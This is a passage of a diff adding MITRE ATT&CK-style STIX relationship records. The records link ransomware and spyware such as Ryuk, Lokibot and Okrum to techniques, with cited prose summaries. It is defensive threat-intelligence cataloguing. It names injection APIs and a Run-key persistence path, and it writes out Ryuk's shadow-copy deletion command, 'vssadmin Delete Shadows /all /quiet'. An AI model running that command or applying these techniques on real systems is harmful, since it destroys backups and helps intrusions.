+ "source_ref": "malware--a020a61c-423f-4195-8c46-ba1d21abba37",
+ "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Ryuk January 2019",
+ "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
+ "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Ryuk](https://attack.mitre.org/software/S0446) has constructed legitimate appearing installation folder paths by calling GetWindowsDirectoryW and then inserting a null byte at the fourth character of the path. For Windows Vista or higher, the path would appear as C:\\Users\\Public.(Citation: CrowdStrike Ryuk January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--5cba4a5e-c005-495d-9cd6-60794d9b3247",
+ "type": "relationship",
+ "modified": "2020-05-15T19:13:48.286Z",
+ "created": "2020-05-14T13:59:58.133Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a020a61c-423f-4195-8c46-ba1d21abba37",
+ "target_ref": "attack-pattern--b80d107d-fa0d-4b60-9684-b0433e8bdba0",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Ryuk January 2019",
+ "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
+ "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Ryuk](https://attack.mitre.org/software/S0446) has used a combination of symmetric (AES) and asymmetric (RSA) encryption to encrypt files. Files have been encrypted with their own AES key and given a file extension of .RYK. Encrypted directories have had a ransom note of RyukReadMe.txt written to the directory.(Citation: CrowdStrike Ryuk January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--adbb2fb8-9a9f-4068-b123-7b557491861d",
+ "type": "relationship",
+ "modified": "2020-05-14T13:59:58.140Z",
+ "created": "2020-05-14T13:59:58.140Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a020a61c-423f-4195-8c46-ba1d21abba37",
+ "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Ryuk January 2019",
+ "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
+ "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Ryuk](https://attack.mitre.org/software/S0446) has used cmd.exe to create a Registry entry to establish persistence.(Citation: CrowdStrike Ryuk January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--5a7aeb29-4f1c-43e4-9efa-dc6fb812f281",
+ "type": "relationship",
+ "modified": "2020-05-14T14:27:31.195Z",
+ "created": "2020-05-14T14:27:31.195Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a020a61c-423f-4195-8c46-ba1d21abba37",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Ryuk January 2019",
+ "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
+ "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Ryuk](https://attack.mitre.org/software/S0446) has used the Windows command line to create a Registry entry under HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run to establish persistence.(Citation: CrowdStrike Ryuk January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--e168a29f-c975-4ae9-8ab9-470bb03ae706",
+ "type": "relationship",
+ "modified": "2020-05-14T14:27:31.203Z",
+ "created": "2020-05-14T14:27:31.203Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a020a61c-423f-4195-8c46-ba1d21abba37",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Ryuk January 2019",
+ "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
+ "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Ryuk](https://attack.mitre.org/software/S0446) has called GetLogicalDrives to emumerate all mounted drives, and GetDriveTypeW to determine the drive type.(Citation: CrowdStrike Ryuk January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--9cf32fea-16cd-41cf-93f3-a47c1388abbc",
+ "type": "relationship",
+ "modified": "2020-05-14T14:27:31.210Z",
+ "created": "2020-05-14T14:27:31.210Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a020a61c-423f-4195-8c46-ba1d21abba37",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Ryuk January 2019",
+ "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
+ "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Ryuk](https://attack.mitre.org/software/S0446) has called GetIpNetTable in attempt to identify all mounted drives and hosts that have Address Resolution Protocol (ARP) entries.(Citation: CrowdStrike Ryuk January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--eebf12c3-1146-4daa-8fd2-c74ad19362f6",
+ "type": "relationship",
+ "modified": "2020-05-15T19:13:48.359Z",
+ "created": "2020-05-14T14:27:31.213Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a020a61c-423f-4195-8c46-ba1d21abba37",
+ "target_ref": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Ryuk January 2019",
+ "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
+ "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Ryuk](https://attack.mitre.org/software/S0446) has used multiple native APIs including ShellExecuteW to run executables,GetWindowsDirectoryW to create folders, and VirtualAlloc, WriteProcessMemory, and CreateRemoteThread for process injection.(Citation: CrowdStrike Ryuk January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--1790f5a1-b5d5-41a4-8da0-c75ed7a23b0d",
+ "type": "relationship",
+ "modified": "2020-05-15T21:51:10.377Z",
+ "created": "2020-05-14T14:27:31.229Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a020a61c-423f-4195-8c46-ba1d21abba37",
+ "target_ref": "attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Ryuk January 2019",
+ "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
+ "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Ryuk](https://attack.mitre.org/software/S0446) has called kill.bat for stopping services, disabling services and killing processes.(Citation: CrowdStrike Ryuk January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--60135ffa-b3f7-4aa8-b12e-faa2719dc5d7",
+ "type": "relationship",
+ "modified": "2020-05-14T14:38:22.607Z",
+ "created": "2020-05-14T14:38:22.607Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a020a61c-423f-4195-8c46-ba1d21abba37",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Ryuk January 2019",
+ "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
+ "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Ryuk](https://attack.mitre.org/software/S0446) has called CreateToolhelp32Snapshot to enumerate all running processes.(Citation: CrowdStrike Ryuk January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--18d29bb2-655b-4e3d-9759-32a74be3eb75",
+ "type": "relationship",
+ "modified": "2020-05-14T14:38:22.630Z",
+ "created": "2020-05-14T14:38:22.630Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a020a61c-423f-4195-8c46-ba1d21abba37",
+ "target_ref": "attack-pattern--dcaa092b-7de9-4a21-977f-7fcb77e89c48",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Ryuk January 2019",
+ "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
+ "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Ryuk](https://attack.mitre.org/software/S0446) has attempted to adjust its token privileges to have the SeDebugPrivilege.(Citation: CrowdStrike Ryuk January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--fa049cca-da7d-4d89-ac34-cab537ce0235",
+ "type": "relationship",
+ "modified": "2020-05-14T14:38:22.633Z",
+ "created": "2020-05-14T14:38:22.633Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a020a61c-423f-4195-8c46-ba1d21abba37",
+ "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Ryuk January 2019",
+ "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
+ "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Ryuk](https://attack.mitre.org/software/S0446) has injected itself into remote processes to encrypt files using a combination of VirtualAlloc, WriteProcessMemory, and CreateRemoteThread.(Citation: CrowdStrike Ryuk January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--afdf9b0e-5539-464a-a403-202eaedb13cd",
+ "type": "relationship",
+ "modified": "2020-05-15T19:13:48.360Z",
+ "created": "2020-05-14T14:38:22.650Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "malware--a020a61c-423f-4195-8c46-ba1d21abba37",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Ryuk January 2019",
+ "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
+ "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "(Citation: CrowdStrike Ryuk January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--6895e54e-3968-41a9-9013-a082cd46fa44",
+ "type": "relationship",
+ "modified": "2020-05-14T14:40:26.221Z",
+ "created": "2020-05-14T14:40:26.221Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "tool--03342581-f790-4f03-ba41-e82e67392e23",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Ryuk January 2019",
+ "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
+ "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "(Citation: CrowdStrike Ryuk January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--d64f970a-8003-41bf-9769-d849c12340ed",
+ "type": "relationship",
+ "modified": "2020-05-14T14:40:26.232Z",
+ "created": "2020-05-14T14:40:26.232Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--2a7914cf-dff3-428d-ab0f-1014d1c28aeb",
+ "target_ref": "malware--a020a61c-423f-4195-8c46-ba1d21abba37",
+ "relationship_type": "uses",
+ "id": "relationship--e9f5096e-b9fc-459a-a303-88763b1269cc",
+ "external_references": [
+ {
+ "description": "McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html",
+ "source_name": "FireEye FIN6 Apr 2019"
+ }
+ ],
+ "description": "(Citation: FireEye FIN6 Apr 2019)",
+ "type": "relationship",
+ "modified": "2020-05-15T19:15:35.568Z",
+ "created": "2020-05-14T14:41:42.975Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a020a61c-423f-4195-8c46-ba1d21abba37",
+ "target_ref": "attack-pattern--f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Ryuk January 2019",
+ "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/",
+ "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Ryuk](https://attack.mitre.org/software/S0446) has used vssadmin Delete Shadows /all /quiet to to delete volume shadow copies and vssadmin resize shadowstorage to force deletion of shadow copies created by third-party applications.(Citation: CrowdStrike Ryuk January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--3194fa27-46b8-4a05-8d3a-12d7bfe9ad15",
+ "type": "relationship",
+ "modified": "2020-05-14T14:51:52.989Z",
+ "created": "2020-05-14T14:51:52.989Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--a020a61c-423f-4195-8c46-ba1d21abba37",
+ "target_ref": "attack-pattern--ac08589e-ee59-4935-8667-d845e38fe579",
+ "external_references": [
+ {
+ "source_name": "FireEye Ryuk and Trickbot January 2019",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html",
+ "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Ryuk](https://attack.mitre.org/software/S0446) has stopped services related to anti-virus.(Citation: FireEye Ryuk and Trickbot January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--156ab177-474c-495c-af01-3cb9147aa703",
+ "type": "relationship",
+ "modified": "2020-05-14T15:09:48.789Z",
+ "created": "2020-05-14T15:09:48.789Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
+ "target_ref": "attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc",
+ "external_references": [
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
+ }
+ ],
+ "description": "[DustySky](https://attack.mitre.org/software/S0062) can shutdown the infected machine.(Citation: Kaspersky MoleRATs April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--43c9340b-453b-424a-b529-090288a54df8",
+ "type": "relationship",
+ "modified": "2020-05-14T15:14:33.474Z",
+ "created": "2020-05-14T15:14:33.474Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
+ "target_ref": "attack-pattern--348f1eef-964b-4eb6-bb53-69b3dcb0c643",
+ "external_references": [
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
+ }
+ ],
+ "description": "[DustySky](https://attack.mitre.org/software/S0062) can detect connected USB devices.(Citation: Kaspersky MoleRATs April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--62a7f7c2-435d-4ef6-aee3-add933fb241d",
+ "type": "relationship",
+ "modified": "2020-05-14T15:14:33.519Z",
+ "created": "2020-05-14T15:14:33.519Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
+ }
+ ],
+ "description": "[DustySky](https://attack.mitre.org/software/S0062) can delete files it creates from the infected system.(Citation: Kaspersky MoleRATs April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--339e60fc-f94c-4b51-bc78-846c29c4340d",
+ "type": "relationship",
+ "modified": "2020-05-14T15:14:33.524Z",
+ "created": "2020-05-14T15:14:33.524Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
+ "target_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58",
+ "external_references": [
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
+ }
+ ],
+ "description": "[DustySky](https://attack.mitre.org/software/S0062) lists all installed software for the infected machine.(Citation: Kaspersky MoleRATs April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--2b89f806-5b78-4599-9536-13b47c35d26d",
+ "type": "relationship",
+ "modified": "2020-05-14T15:14:33.527Z",
+ "created": "2020-05-14T15:14:33.527Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411",
+ "target_ref": "attack-pattern--3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "external_references": [
+ {
+ "source_name": "Kaspersky MoleRATs April 2019",
+ "url": "https://securelist.com/gaza-cybergang-group1-operation-sneakypastes/90068/",
+ "description": "GReAT. (2019, April 10). Gaza Cybergang Group1, operation SneakyPastes. Retrieved May 13, 2020."
+ }
+ ],
+ "description": "[Molerats](https://attack.mitre.org/groups/G0021) decompresses ZIP files once on the victim machine.(Citation: Kaspersky MoleRATs April 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--497aec05-cb34-424d-943f-4fdfbf2585b4",
+ "type": "relationship",
+ "modified": "2020-05-14T15:35:08.806Z",
+ "created": "2020-05-14T15:35:08.806Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cb741463-f0fe-42e0-8d45-bc7e8335f5ae",
+ "target_ref": "attack-pattern--b200542e-e877-4395-875b-cf1a44537ca4",
+ "external_references": [
+ {
+ "source_name": "Infoblox Lokibot January 2019",
+ "url": "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--22",
+ "description": "Hoang, M. (2019, January 31). Malicious Activity Report: Elements of Lokibot Infostealer. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[Lokibot](https://attack.mitre.org/software/S0447) has used process hollowing to inject into legitimate Windows process vbc.exe.(Citation: Infoblox Lokibot January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--33a464ab-cc0d-436d-9bcd-9d6e08994370",
+ "type": "relationship",
+ "modified": "2020-05-18T13:38:59.124Z",
+ "created": "2020-05-14T19:06:50.917Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cb741463-f0fe-42e0-8d45-bc7e8335f5ae",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "Infoblox Lokibot January 2019",
+ "url": "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--22",
+ "description": "Hoang, M. (2019, January 31). Malicious Activity Report: Elements of Lokibot Infostealer. Retrieved May 15, 2020."
+ }
+ ],
+ "description": "[Lokibot](https://attack.mitre.org/software/S0447) has obfuscated strings with base64 encoding.(Citation: Infoblox Lokibot January 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--0dd73de5-d615-4455-a552-ff382ec75e82",
+ "type": "relationship",
+ "modified": "2020-05-18T22:00:40.676Z",
+ "created": "2020-05-14T19:06:50.931Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--cb741463-f0fe-42e0-8d45-bc7e8335f5ae",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "TrendMicro Msiexec Feb 2018",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/",
+ "description": "Co, M. and Sison, G. (2018, February 8). Attack Using Windows Installer msiexec.exe leads to LokiBot. Retrieved April 18, 2019."
+ }
+ ],
+ "description": "[Lokibot](https://attack.mitre.org/software/S0447) has been executed through malicious documents contained in spearphishing e-mails.(Citation: TrendMicro Msiexec Feb 2018)",
+ "relationship_type": "uses",
+ "id": "relationship--da33f077-8ce2-4a2d-a8ed-f9f21799c80e",
+ "type": "relationship",
+ "modified": "2020-05-14T19:06:50.933Z",
+ "created": "2020-05-14T19:06:50.933Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--8f423bd7-6ca7-4303-9e85-008c7ad5fdaa",
+ "target_ref": "attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada",
+ "external_references": [
+ {
+ "source_name": "ESET Attor Oct 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf",
+ "description": "Hromcova, Z. (2019, October). AT COMMANDS, TOR-BASED COMMUNICATIONS: MEET ATTOR, A FANTASY CREATURE AND ALSO A SPY PLATFORM. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Attor](https://attack.mitre.org/software/S0438)'s Blowfish key is encrypted with a public RSA key.(Citation: ESET Attor Oct 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--44de534a-f105-4016-b7a4-2e7fce8a203e",
+ "type": "relationship",
+ "modified": "2020-07-07T12:35:12.294Z",
+ "created": "2020-05-14T20:55:00.055Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) loader only executes the payload after the left mouse button has been pressed at least three times, in order to avoid being executed within virtualized or emulated environments.(Citation: ESET Okrum July 2019) ",
+ "relationship_type": "uses",
+ "id": "relationship--121152af-4bfe-4202-ade0-aad9fb85e0ad",
+ "type": "relationship",
+ "modified": "2020-05-14T21:17:54.058Z",
+ "created": "2020-05-14T21:17:54.058Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "external_references": [
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) establishes persistence by creating a .lnk shortcut to itself in the Startup folder.(Citation: ESET Okrum July 2019) ",
+ "relationship_type": "uses",
+ "id": "relationship--cab93d90-f8de-4bb3-8868-11b8d9a2ddf9",
+ "type": "relationship",
+ "modified": "2020-05-14T21:17:54.070Z",
+ "created": "2020-05-14T21:17:54.070Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--5e78ae92-3ffd-4b16-bf62-e798529d73f1",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "external_references": [
+ {
+ "source_name": "McAfee Sharpshooter December 2018",
